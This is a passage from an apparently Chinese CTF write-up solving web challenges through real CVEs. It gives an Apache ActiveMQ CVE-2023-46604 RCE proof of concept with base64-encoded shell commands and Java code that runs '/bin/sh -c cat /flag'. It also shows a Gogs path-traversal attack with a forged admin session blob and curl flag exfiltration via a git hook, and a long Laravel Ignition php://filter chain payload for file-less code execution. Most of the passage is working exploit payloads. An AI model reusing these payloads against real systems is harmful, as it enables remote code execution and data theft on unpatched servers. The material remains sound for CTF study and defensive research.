ZWFJsVVhWbGRXVW9JbVpzWVdkeGRXVjFaU0lwT3dvZ0lDQWdJQ0FnSUUxbGMzTmhaMlZRY205a2RXTmxjaUJ3ZFdKc2FYTm9aWElnUFNCd2RXSlRaWE56YVc5dUxtTnlaV0YwWlZCeWIyUjFZMlZ5S0hGMVpYVmxLVHNLSUNBZ0lDQWdJQ0JUZEhKcGJtZGJYU0JqYldRZ1BTQnVaWGNnVTNSeWFXNW5XMTE3SWk5aWFXNHZjMmdpTENJdFl5SXNJbU5oZENBdlpteGhaeUo5T3dvZ0lDQWdJQ0FnSUdKNWRHVmJYU0JpY3lBOUlHNWxkeUJUWTJGdWJtVnlLRzVsZHlCUWNtOWpaWE56UW5WcGJHUmxjaWhqYldRcExuTjBZWEowS0NrdVoyVjBTVzV3ZFhSVGRISmxZVzBvS1NrS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUM1MWMyVkVaV3hwYldsMFpYSW9JbHhjUVNJcENpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBdWJtVjRkQ2dwQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0F1WjJWMFFubDBaWE1vS1RzS0lDQWdJQ0FnSUNCVGRISnBibWNnYldWemMyRm5aU0E5SUc1bGR5QlRkSEpwYm1jb1luTXBPd29nSUNBZ0lDQWdJRlJsZUhSTlpYTnpZV2RsSUcxelp5QTlJSEIxWWxObGMzTnBiMjR1WTNKbFlYUmxWR1Y0ZEUxbGMzTmhaMlVvS1RzS0lDQWdJQ0FnSUNCdGMyY3VjMlYwVkdWNGRDaHRaWE56WVdkbEtUc0tJQ0FnSUNBZ0lDQndkV0pzYVhOb1pYSXVjMlZ1WkNodGMyY3BPd29nSUNBZ0lDQWdJRk41YzNSbGJTNXZkWFF1Y0hKcGJuUnNiaWdpY0hWaWJHbHphQ0JtYVc1cGMyaGxaQ0lwT3dvZ0lDQWdJQ0FnSUdOdmJtNWxZM1JwYjI0dVkyeHZjMlVvS1RzS0lDQWdJSDBLQ2lBZ0lDQndjbWwyWVhSbElIWnZhV1FnWTI5dWMzVnRaU2dwSUhSb2NtOTNjeUJGZUdObGNIUnBiMjRnZXdvZ0lDQWdJQ0FnSUVOdmJtNWxZM1JwYjI1R1lXTjBiM0o1SUdaaFkzUnZjbmtnUFNCdVpYY2dRV04wYVhabFRWRkRiMjV1WldOMGFXOXVSbUZqZEc5eWVTZ2lkR053T2k4dmVIaDRPall4TmpFMklpazdDaUFnSUNBZ0lDQWdRMjl1Ym1WamRHbHZiaUJqYjI1dVpXTjBhVzl1SUQwZ1ptRmpkRzl5ZVM1amNtVmhkR1ZEYjI1dVpXTjBhVzl1S0NrN0NpQWdJQ0FnSUNBZ1UyVnpjMmx2YmlCemRXSlRaWE56YVc5dUlEMGdZMjl1Ym1WamRHbHZiaTVqY21WaGRHVlRaWE56YVc5dUtHWmhiSE5sTENCVFpYTnphVzl1TGtGVlZFOWZRVU5MVGs5WFRFVkVSMFVwT3dvZ0lDQWdJQ0FnSUZGMVpYVmxJSEYxWlhWbElEMGdjM1ZpVTJWemMybHZiaTVqY21WaGRHVlJkV1YxWlNnaVpteGhaM0YxWlhWbElpazdDaUFnSUNBZ0lDQWdUV1Z6YzJGblpVTnZibk4xYldWeUlITjFZbk5qY21saVpYSWdQU0J6ZFdKVFpYTnphVzl1TG1OeVpXRjBaVU52Ym5OMWJXVnlLSEYxWlhWbEtUc0tJQ0FnSUNBZ0lDQnpkV0p6WTNKcFltVnlMbk5sZEUxbGMzTmhaMlZNYVhOMFpXNWxjaWgwYUdsektUc0tJQ0FnSUNBZ0lDQmpiMjV1WldOMGFXOXVMbk4wWVhKMEtDazdDaUFnSUNCOUNnb0tJQ0FnSUhCMVlteHBZeUJ6ZEdGMGFXTWdkbTlwWkNCdFlXbHVLRk4wY21sdVoxdGRJR0Z5WjNNcElIUm9jbTkzY3lCRmVHTmxjSFJwYjI0Z2V3b2dJQ0FnSUNBZ0lFMWhhVzRnYldGcGJpQTlJRzVsZHlCTllXbHVLQ2s3Q2lBZ0lDQWdJQ0FnSUcxaGFXNHVjSFZpYkdsemFDZ3BPd29nSUNBZ2ZRb0tJQ0FnSUVCUGRtVnljbWxrWlFvZ0lDQWdjSFZpYkdsaklIWnZhV1FnYjI1TlpYTnpZV2RsS0UxbGMzTmhaMlVnYldWemMyRm5aU2tnZXdvZ0lDQWdJQ0FnSUhSeWVTQjdDaUFnSUNBZ0lDQWdJQ0FnSUZONWMzUmxiUzV2ZFhRdWNISnBiblJzYmlnaVVtVmpaV2wyWldRZ0lpQXJJQ2dvVkdWNGRFMWxjM05oWjJVcElHMWxjM05oWjJVcExtZGxkRlJsZUhRb0tTazdDaUFnSUNBZ0lDQWdmU0JqWVhSamFDQW9SWGhqWlhCMGFXOXVJR1VwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdaUzV3Y21sdWRGTjBZV05yVkhKaFkyVW9LVHNLSUNBZ0lDQWdJQ0I5Q2lBZ0lDQjlDbjBnSUNBS3xiYXNlNjQgLWQgPi90bXAvTWFpbi5jbGFzcyJdfQ==
|
java -cp /opt/apache-activemq/lib/optional/*:/tmp/:/opt/apache-activemq/activemq-all-5.17.5.jar Main
然后顺着上面X1roz师傅的poc,我们可以改为
1
2
3
4
5
6
7
8
| public void oneway(Object command) throws IOException {
this.checkStarted();
Throwable obj = new ClassPathXmlApplicationContext("http://127.0.0.1:8877/api/sun.print.PrintServiceLookupProvider/eyJscGNBbGxDb20iOlsiZWNobyBhVzF3YjNKMElHOXlaeTVoY0dGamFHVXVZV04wYVhabGJYRXVRV04wYVhabFRWRkRiMjV1WldOMGFXOXVSbUZqZEc5eWVUc0thVzF3YjNKMElHcGhkbUY0TG1wdGN5NHFPd29LY0hWaWJHbGpJR05zWVhOeklFMWhhVzRnYVcxd2JHVnRaVzUwY3lCTlpYTnpZV2RsVEdsemRHVnVaWElnZXdvZ0lDQWdjSEpwZG1GMFpTQjJiMmxrSUhCMVlteHBjMmdvS1NCMGFISnZkM01nUlhoalpYQjBhVzl1SUhzS0lDQWdJQ0FnSUNCcVlYWmhlQzVxYlhNdVEyOXVibVZqZEdsdmJrWmhZM1J2Y25rZ1ptRmpkRzl5ZVRzS0lDQWdJQ0FnSUNCbVlXTjBiM0o1SUQwZ2JtVjNJRUZqZEdsMlpVMVJRMjl1Ym1WamRHbHZia1poWTNSdmNua29JblJqY0Rvdkx6RXlOeTR3TGpBdU1UbzJNVFl4TmlJcE93b2dJQ0FnSUNBZ0lFTnZibTVsWTNScGIyNGdZMjl1Ym1WamRHbHZiaUE5SUdaaFkzUnZjbmt1WTNKbFlYUmxRMjl1Ym1WamRHbHZiaWdwT3dvZ0lDQWdJQ0FnSUZObGMzTnBiMjRnY0hWaVUyVnpjMmx2YmlBOUlHTnZibTVsWTNScGIyNHVZM0psWVhSbFUyVnpjMmx2YmlobVlXeHpaU3dnVTJWemMybHZiaTVCVlZSUFgwRkRTMDVQVjB4RlJFZEZLVHNLSUNBZ0lDQWdJQ0JSZFdWMVpTQnhkV1YxWlNBOUlIQjFZbE5sYzNOcGIyNHVZM0psWVhSbFVYVmxkV1VvSW1ac1lXZHhkV1YxWlNJcE93b2dJQ0FnSUNBZ0lFMWxjM05oWjJWUWNtOWtkV05sY2lCd2RXSnNhWE5vWlhJZ1BTQndkV0pUWlhOemFXOXVMbU55WldGMFpWQnliMlIxWTJWeUtIRjFaWFZsS1RzS0lDQWdJQ0FnSUNCVGRISnBibWRiWFNCamJXUWdQU0J1WlhjZ1UzUnlhVzVuVzExN0lpOWlhVzR2YzJnaUxDSXRZeUlzSW1OaGRDQXZabXhoWnlKOU93b2dJQ0FnSUNBZ0lHSjVkR1ZiWFNCaWN5QTlJRzVsZHlCVFkyRnVibVZ5S0c1bGR5QlFjbTlqWlhOelFuVnBiR1JsY2loamJXUXBMbk4wWVhKMEtDa3VaMlYwU1c1d2RYUlRkSEpsWVcwb0tTa0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDNTFjMlZFWld4cGJXbDBaWElvSWx4Y1FTSXBDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQXVibVY0ZENncENpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBdVoyVjBRbmwwWlhNb0tUc0tJQ0FnSUNBZ0lDQlRkSEpwYm1jZ2JXVnpjMkZuWlNBOUlHNWxkeUJUZEhKcGJtY29Zbk1wT3dvZ0lDQWdJQ0FnSUZSbGVIUk5aWE56WVdkbElHMXpaeUE5SUhCMVlsTmxjM05wYjI0dVkzSmxZWFJsVkdWNGRFMWxjM05oWjJVb0tUc0tJQ0FnSUNBZ0lDQnRjMmN1YzJWMFZHVjRkQ2h0WlhOellXZGxLVHNLSUNBZ0lDQWdJQ0J3ZFdKc2FYTm9aWEl1YzJWdVpDaHRjMmNwT3dvZ0lDQWdJQ0FnSUZONWMzUmxiUzV2ZFhRdWNISnBiblJzYmlnaWNIVmliR2x6YUNCbWFXNXBjMmhsWkNJcE93b2dJQ0FnSUNBZ0lHTnZibTVsWTNScGIyNHVZMnh2YzJVb0tUc0tJQ0FnSUgwS0NpQWdJQ0J3Y21sMllYUmxJSFp2YVdRZ1kyOXVjM1Z0WlNncElIUm9jbTkzY3lCRmVHTmxjSFJwYjI0Z2V3b2dJQ0FnSUNBZ0lFTnZibTVsWTNScGIyNUdZV04wYjNKNUlHWmhZM1J2Y25rZ1BTQnVaWGNnUVdOMGFYWmxUVkZEYjI1dVpXTjBhVzl1Um1GamRHOXllU2dpZEdOd09pOHZlSGg0T2pZeE5qRTJJaWs3Q2lBZ0lDQWdJQ0FnUTI5dWJtVmpkR2x2YmlCamIyNXVaV04wYVc5dUlEMGdabUZqZEc5eWVTNWpjbVZoZEdWRGIyNXVaV04wYVc5dUtDazdDaUFnSUNBZ0lDQWdVMlZ6YzJsdmJpQnpkV0pUWlhOemFXOXVJRDBnWTI5dWJtVmpkR2x2Ymk1amNtVmhkR1ZUWlhOemFXOXVLR1poYkhObExDQlRaWE56YVc5dUxrRlZWRTlmUVVOTFRrOVhURVZFUjBVcE93b2dJQ0FnSUNBZ0lGRjFaWFZsSUhGMVpYVmxJRDBnYzNWaVUyVnpjMmx2Ymk1amNtVmhkR1ZSZFdWMVpTZ2labXhoWjNGMVpYVmxJaWs3Q2lBZ0lDQWdJQ0FnVFdWemMyRm5aVU52Ym5OMWJXVnlJSE4xWW5OamNtbGlaWElnUFNCemRXSlRaWE56YVc5dUxtTnlaV0YwWlVOdmJuTjFiV1Z5S0hGMVpYVmxLVHNLSUNBZ0lDQWdJQ0J6ZFdKelkzSnBZbVZ5TG5ObGRFMWxjM05oWjJWTWFYTjBaVzVsY2loMGFHbHpLVHNLSUNBZ0lDQWdJQ0JqYjI1dVpXTjBhVzl1TG5OMFlYSjBLQ2s3Q2lBZ0lDQjlDZ29LSUNBZ0lIQjFZbXhwWXlCemRHRjBhV01nZG05cFpDQnRZV2x1S0ZOMGNtbHVaMXRkSUdGeVozTXBJSFJvY205M2N5QkZlR05sY0hScGIyNGdld29nSUNBZ0lDQWdJRTFoYVc0Z2JXRnBiaUE5SUc1bGR5Qk5ZV2x1S0NrN0NpQWdJQ0FnSUNBZ0lHMWhhVzR1Y0hWaWJHbHphQ2dwT3dvZ0lDQWdmUW9LSUNBZ0lFQlBkbVZ5Y21sa1pRb2dJQ0FnY0hWaWJHbGpJSFp2YVdRZ2IyNU5aWE56WVdkbEtFMWxjM05oWjJVZ2JXVnpjMkZuWlNrZ2V3b2dJQ0FnSUNBZ0lIUnllU0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lGTjVjM1JsYlM1dmRYUXVjSEpwYm5Sc2JpZ2lVbVZqWldsMlpXUWdJaUFySUNnb1ZHVjRkRTFsYzNOaFoyVXBJRzFsYzNOaFoyVXBMbWRsZEZSbGVIUW9LU2s3Q2lBZ0lDQWdJQ0FnZlNCallYUmphQ0FvUlhoalpYQjBhVzl1SUdVcElIc0tJQ0FnSUNBZ0lDQWdJQ0FnWlM1d2NtbHVkRk4wWVdOclZISmhZMlVvS1RzS0lDQWdJQ0FnSUNCOUNpQWdJQ0I5Q24wZ0lDQUt8YmFzZTY0IC1kID4vdG1wL01haW4uY2xhc3MiLCJlY2hvIGFXMXdiM0owSUc5eVp5NWhjR0ZqYUdVdVlXTjBhWFpsYlhFdVFXTjBhWFpsVFZGRGIyNXVaV04wYVc5dVJtRmpkRzl5ZVRzS2FXMXdiM0owSUdwaGRtRjRMbXB0Y3k0cU93b0tjSFZpYkdsaklHTnNZWE56SUUxaGFXNGdhVzF3YkdWdFpXNTBjeUJOWlhOellXZGxUR2x6ZEdWdVpYSWdld29nSUNBZ2NISnBkbUYwWlNCMmIybGtJSEIxWW14cGMyZ29LU0IwYUhKdmQzTWdSWGhqWlhCMGFXOXVJSHNLSUNBZ0lDQWdJQ0JxWVhaaGVDNXFiWE11UTI5dWJtVmpkR2x2YmtaaFkzUnZjbmtnWm1GamRHOXllVHNLSUNBZ0lDQWdJQ0JtWVdOMGIzSjVJRDBnYm1WM0lFRmpkR2wyWlUxUlEyOXVibVZqZEdsdmJrWmhZM1J2Y25rb0luUmpjRG92THpFeU55NHdMakF1TVRvMk1UWXhOaUlwT3dvZ0lDQWdJQ0FnSUVOdmJtNWxZM1JwYjI0Z1kyOXVibVZqZEdsdmJpQTlJR1poWTNSdmNua3VZM0psWVhSbFEyOXVibVZqZEdsdmJpZ3BPd29nSUNBZ0lDQWdJRk5sYzNOcGIyNGdjSFZpVTJWemMybHZiaUE5SUdOdmJtNWxZM1JwYjI0dVkzSmxZWFJsVTJWemMybHZiaWhtWVd4elpTd2dVMlZ6YzJsdmJpNUJWVlJQWDBGRFMwNVBWMHhGUkVkRktUc0tJQ0FnSUNBZ0lDQlJkV1YxWlNCeGRXVjFaU0E5SUhCMVlsTmxjM05wYjI0dVkzSmxZWFJsVVhWbGRXVW9JbVpzWVdkeGRXVjFaU0lwT3dvZ0lDQWdJQ0FnSUUxbGMzTmhaMlZRY205a2RXTmxjaUJ3ZFdKc2FYTm9aWElnUFNCd2RXSlRaWE56YVc5dUxtTnlaV0YwWlZCeWIyUjFZMlZ5S0hGMVpYVmxLVHNLSUNBZ0lDQWdJQ0JUZEhKcGJtZGJYU0JqYldRZ1BTQnVaWGNnVTNSeWFXNW5XMTE3SWk5aWFXNHZjMmdpTENJdFl5SXNJbU5oZENBdlpteGhaeUo5T3dvZ0lDQWdJQ0FnSUdKNWRHVmJYU0JpY3lBOUlHNWxkeUJUWTJGdWJtVnlLRzVsZHlCUWNtOWpaWE56UW5WcGJHUmxjaWhqYldRcExuTjBZWEowS0NrdVoyVjBTVzV3ZFhSVGRISmxZVzBvS1NrS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUM1MWMyVkVaV3hwYldsMFpYSW9JbHhjUVNJcENpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBdWJtVjRkQ2dwQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0F1WjJWMFFubDBaWE1vS1RzS0lDQWdJQ0FnSUNCVGRISnBibWNnYldWemMyRm5aU0E5SUc1bGR5QlRkSEpwYm1jb1luTXBPd29nSUNBZ0lDQWdJRlJsZUhSTlpYTnpZV2RsSUcxelp5QTlJSEIxWWxObGMzTnBiMjR1WTNKbFlYUmxWR1Y0ZEUxbGMzTmhaMlVvS1RzS0lDQWdJQ0FnSUNCdGMyY3VjMlYwVkdWNGRDaHRaWE56WVdkbEtUc0tJQ0FnSUNBZ0lDQndkV0pzYVhOb1pYSXVjMlZ1WkNodGMyY3BPd29nSUNBZ0lDQWdJRk41YzNSbGJTNXZkWFF1Y0hKcGJuUnNiaWdpY0hWaWJHbHphQ0JtYVc1cGMyaGxaQ0lwT3dvZ0lDQWdJQ0FnSUdOdmJtNWxZM1JwYjI0dVkyeHZjMlVvS1RzS0lDQWdJSDBLQ2lBZ0lDQndjbWwyWVhSbElIWnZhV1FnWTI5dWMzVnRaU2dwSUhSb2NtOTNjeUJGZUdObGNIUnBiMjRnZXdvZ0lDQWdJQ0FnSUVOdmJtNWxZM1JwYjI1R1lXTjBiM0o1SUdaaFkzUnZjbmtnUFNCdVpYY2dRV04wYVhabFRWRkRiMjV1WldOMGFXOXVSbUZqZEc5eWVTZ2lkR053T2k4dmVIaDRPall4TmpFMklpazdDaUFnSUNBZ0lDQWdRMjl1Ym1WamRHbHZiaUJqYjI1dVpXTjBhVzl1SUQwZ1ptRmpkRzl5ZVM1amNtVmhkR1ZEYjI1dVpXTjBhVzl1S0NrN0NpQWdJQ0FnSUNBZ1UyVnpjMmx2YmlCemRXSlRaWE56YVc5dUlEMGdZMjl1Ym1WamRHbHZiaTVqY21WaGRHVlRaWE56YVc5dUtHWmhiSE5sTENCVFpYTnphVzl1TGtGVlZFOWZRVU5MVGs5WFRFVkVSMFVwT3dvZ0lDQWdJQ0FnSUZGMVpYVmxJSEYxWlhWbElEMGdjM1ZpVTJWemMybHZiaTVqY21WaGRHVlJkV1YxWlNnaVpteGhaM0YxWlhWbElpazdDaUFnSUNBZ0lDQWdUV1Z6YzJGblpVTnZibk4xYldWeUlITjFZbk5qY21saVpYSWdQU0J6ZFdKVFpYTnphVzl1TG1OeVpXRjBaVU52Ym5OMWJXVnlLSEYxWlhWbEtUc0tJQ0FnSUNBZ0lDQnpkV0p6WTNKcFltVnlMbk5sZEUxbGMzTmhaMlZNYVhOMFpXNWxjaWgwYUdsektUc0tJQ0FnSUNBZ0lDQmpiMjV1WldOMGFXOXVMbk4wWVhKMEtDazdDaUFnSUNCOUNnb0tJQ0FnSUhCMVlteHBZeUJ6ZEdGMGFXTWdkbTlwWkNCdFlXbHVLRk4wY21sdVoxdGRJR0Z5WjNNcElIUm9jbTkzY3lCRmVHTmxjSFJwYjI0Z2V3b2dJQ0FnSUNBZ0lFMWhhVzRnYldGcGJpQTlJRzVsZHlCTllXbHVLQ2s3Q2lBZ0lDQWdJQ0FnSUcxaGFXNHVjSFZpYkdsemFDZ3BPd29nSUNBZ2ZRb0tJQ0FnSUVCUGRtVnljbWxrWlFvZ0lDQWdjSFZpYkdsaklIWnZhV1FnYjI1TlpYTnpZV2RsS0UxbGMzTmhaMlVnYldWemMyRm5aU2tnZXdvZ0lDQWdJQ0FnSUhSeWVTQjdDaUFnSUNBZ0lDQWdJQ0FnSUZONWMzUmxiUzV2ZFhRdWNISnBiblJzYmlnaVVtVmpaV2wyWldRZ0lpQXJJQ2dvVkdWNGRFMWxjM05oWjJVcElHMWxjM05oWjJVcExtZGxkRlJsZUhRb0tTazdDaUFnSUNBZ0lDQWdmU0JqWVhSamFDQW9SWGhqWlhCMGFXOXVJR1VwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdaUzV3Y21sdWRGTjBZV05yVkhKaFkyVW9LVHNLSUNBZ0lDQWdJQ0I5Q2lBZ0lDQjlDbjBnSUNBS3xiYXNlNjQgLWQgPi90bXAvTWFpbi5jbGFzcyJdfQ==");
ExceptionResponse response = new ExceptionResponse(obj);
this.wireFormat.marshal(response, this.dataOut);
this.dataOut.flush();
}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| import org.apache.activemq.ActiveMQConnectionFactory;
import javax.jms.*;
public class Main implements MessageListener {
public static void main(String[] args) throws Exception {
javax.jms.ConnectionFactory factory;
factory = new ActiveMQConnectionFactory("tcp://127.0.0.1:61616");
Connection connection = factory.createConnection();
Session pubSession = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);
Queue queue = pubSession.createQueue("flagqueue");
MessageProducer publisher = pubSession.createProducer(queue);
String[] cmd = new String[]{"/bin/sh","-c","cat /flag"};
byte[] bs = new Scanner(new ProcessBuilder(cmd).start().getInputStream())
.useDelimiter("\\A")
.next()
.getBytes();
String message = new String(bs);
TextMessage msg = pubSession.createTextMessage();
msg.setText(message);
publisher.send(msg);
System.out.println("publish finished");
connection.close();
}
}
|
写到这里去把ApacheMQ的漏洞学完了一遍,很精彩。地址在这
https://boogipop.com/2023/11/03/Apache%20ActiveMQ%20CVE-2023-46604%20RCE%20%E5%88%86%E6%9E%90/
那么我们接下来只需要仿照上述的poc进行ssrf即可。
复现起来过于麻烦- -到这一步就可以了,其实这个不出网就很多余捏
你把ApacheMQ放外头,port放里头不映射端口不也是一样的吗
ggbond’s gogs
U1S1不是特别想看,只是单纯的贴个wp的内容
参考:
N1CTF 2023 writeup
internal/db/repo_editor.go UpdateRepoFile 函数,之前爆过 NewTreeName 参数的目录穿越写 .git/config RCE,修了之后
NewTreeName 加了过滤。
观察 OldTreeName 参数,从 Web 接口访问时是从数据库取的 c.Repo.TreePath,从 API 接口 PUT /repos/:username/:reponame/contents/* 访问时,是直接 c.Param(“*”) 从路由中取的。所以传入 ../../ 可以目录穿越任意文件写。
直接本地起一个 Gogs,ID 1 管理员名称为 root。默认 Session 存文件,将管理员 Session Base64 后发送请求写 Session 文件到指定目录下。
1
| Dv+BBAEC/4IAARABEAAAWv+CAAMGc3RyaW5nDAcABXVuYW1lBnN0cmluZwwGAARyb290BnN0cmluZwwKAAhfb2xkX3VpZAZzdHJpbmcMAwABMQZzdHJpbmcMBQADdWlkBWludDY0BAIAAg==
|
普通账户后台建一个 API Token,调用 API:
用 Cookie f01f9038fe591924 登入管理员账号,给任意一个仓库配置 Git pre-receive 钩子,然后再向这个仓库上传文件,即可触发钩子的命令实现 RCE。用 curl 将 flag 带出来:
我真勤劳(我是懒狗)
Laravel
P神知识星球里的一个filterchain无文件方法
直接覆盖那个index.php
1
2
3
4
5
6
7
| {
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "username",
"viewFile": "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CN.ISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO_6937-2:1983.R9|convert.iconv.OSF00010005.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.